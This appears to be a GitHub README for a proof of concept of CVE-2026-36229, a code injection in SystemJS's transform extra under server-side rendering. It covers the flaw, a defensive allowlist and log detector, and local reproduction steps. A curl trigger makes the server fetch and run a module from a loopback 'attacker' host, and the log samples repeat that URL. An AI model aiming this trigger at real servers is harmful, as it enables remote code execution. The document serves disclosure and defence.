GitHub: NullByte8080/CVE-2026-36229
# CVE-2026-36229: SystemJS Transform Extra Server-Side Rendering Code Injection
## Vulnerability Summary
- **CVE ID:** CVE-2026-36229
- **Vendor:** SystemJS Open Source Project
- **Product:** SystemJS
- **Affected Component:** `dist/extras/transform.js` (Transform Extra Module)
- **Vulnerability Type:** Improper Control of Generation of Code / Code Injection (CWE-94)
- **Impact:** Remote Code Execution (RCE) / Security Bypass
## Description
A Code Injection vulnerability exists in SystemJS when deployed within a Server-Side Rendering (SSR) backend architecture where the `transform` extra (`dist/extras/transform.js`) is actively enabled.
When the backend SSR application accepts an untrusted, user-supplied component URL and imports it dynamically via SystemJS, the transform engine fetches the remote resource. If the target resource is evaluated as a non-WASM module, the engine executes the code content using an un-sandboxed `eval()` block. A remote attacker can pass a malicious, self-hosted JavaScript module URL to the application's rendering endpoints, allowing arbitrary system-level commands to execute directly inside the host's Node.js process context.
## Technical Analysis & Attack Scenario
The vulnerability relies on a combination of specific configuration parameters:
1. An input parameter allows an external client to specify a module or component path for server-side processing.
2. SystemJS is instructed to handle the import while relying on the `transform.js` extension.
3. Because the extension relies on global string evaluation primitives to convert source modules dynamically, the execution flow seamlessly shifts control to the code contained within the fetched third-party asset.
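As an added defensive example, not part of this PoC repository, the following Node.js code removes precondition 1 by resolving the `component` parameter only through a fixed registry of local modules before anything reaches `System.import()`, and adds a log check that flags render requests which carried a remote module URL. The registry contents, the component names and the access-log format are assumptions.

```javascript
// Added example (not from the PoC repository): allowlist guard for the SSR render
// endpoint's `component` parameter plus a log check for remote module URLs.
// Assumed registry: public component names -> fixed local module specifiers.
const COMPONENT_REGISTRY = new Map([
  ['header', './components/header.js'],
  ['article', './components/article.js'],
]);
// Bare identifiers only; URLs, paths and protocol-relative references never match.
const NAME_RE = /^[a-z][a-z0-9-]{0,63}$/;

// Returns the local specifier to hand to System.import(), or a rejection.
function resolveComponent(userInput) {
  if (typeof userInput !== 'string') return { ok: false, reason: 'missing' };
  const name = userInput.trim();
  if (!NAME_RE.test(name)) return { ok: false, reason: 'not an identifier' };
  const specifier = COMPONENT_REGISTRY.get(name);
  if (!specifier) return { ok: false, reason: 'unknown component' };
  return { ok: true, specifier };
}

// True when the value would make SystemJS fetch from a location the server did
// not choose: any absolute URL, or a protocol-relative reference.
function isRemoteSpecifier(value) {
  try {
    new URL(value); // throws for bare names and relative paths
    return true;
  } catch {
    return value.startsWith('//');
  }
}

// Constructed sample access-log lines (`METHOD PATH STATUS`), not real traffic.
const SAMPLE_LOG = [
  'GET /render?component=header 200',
  'GET /render?component=http://127.0.0.1:9001/payload.js?run=1 200',
  'GET /static/app.js 200',
];
// Returns the component values of /render requests that carried a remote URL,
// the signal a detection rule for this issue would alert on.
function flagSuspiciousRequests(logLines) {
  const hits = [];
  for (const line of logLines) {
    const [, method, path] = line.match(/^(\w+) (\S+) \d{3}$/) || [];
    if (method !== 'GET' || !path.startsWith('/render')) continue;
    const component = new URL(path, 'http://localhost').searchParams.get('component');
    if (component && isRemoteSpecifier(component)) hits.push(component);
  }
  return hits;
}
```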
## Local Reproduction & Proof of Concept (PoC)
### Repository Architecture
* `vulnerable-ssr-server.cjs` - The target Node.js SSR application that accepts and processes a user-controlled component string.
* `attacker-server.cjs` - A loopback server mimicking an external actor, configured to host and deliver the benign payload block.
### Environment Setup
To bring up the test environment, open your terminals and run the following sequence.
### Run
Install dependencies:
```shell
npm install
```
Terminal 1:
```shell
npm run attacker
```
Terminal 2:
```shell
npm run ssr
```
Trigger from another terminal:
```shell
curl 'http://127.0.0.1:8080/render?component=http://127.0.0.1:9001/payload.js?run=1'
```
Expected proof:
```
/tmp/pwned
/tmp/pwned/systemjs-ssr-rce.txt
```
Use a fresh `run=` value for repeated tests after deleting the proof directory, since SystemJS caches imported modules by URL. The payload is intentionally benign: it creates `/tmp/pwned`, writes a proof file, and exports a `render()` function so the SSR page still completes.